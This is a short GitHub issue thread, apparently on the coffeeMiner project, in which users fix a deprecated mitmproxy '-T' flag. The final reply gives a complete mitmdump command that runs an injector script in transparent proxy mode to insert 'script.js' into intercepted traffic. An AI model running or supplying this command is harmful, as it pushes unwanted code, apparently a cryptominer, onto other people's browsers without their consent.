coffeeMiner icon indicating copy to clipboard operation
coffeeMiner copied to clipboard

Try command

Open PigiBouxx opened this issue 7 years ago • 4 comments

Hello, When i tried the command, mitmproxy -T this return

mitmproxy: error: unrecognized arguments: -T

-T is deprecated, please use --mode transparent instead

What can i do?

PigiBouxx avatar Jan 13 '18 00:01 PigiBouxx

Same here

BubbleZZ avatar May 31 '18 03:05 BubbleZZ

Same here

phphubert avatar Jul 09 '18 05:07 phphubert

please use --mode transparent instead

H4xl0r avatar Aug 14 '18 23:08 H4xl0r

use like this ("~/.local/bin/mitmdump -s injector.py 'localhost:8000/script.js' --mode transparent")

Zscripts avatar Oct 17 '18 08:10 Zscripts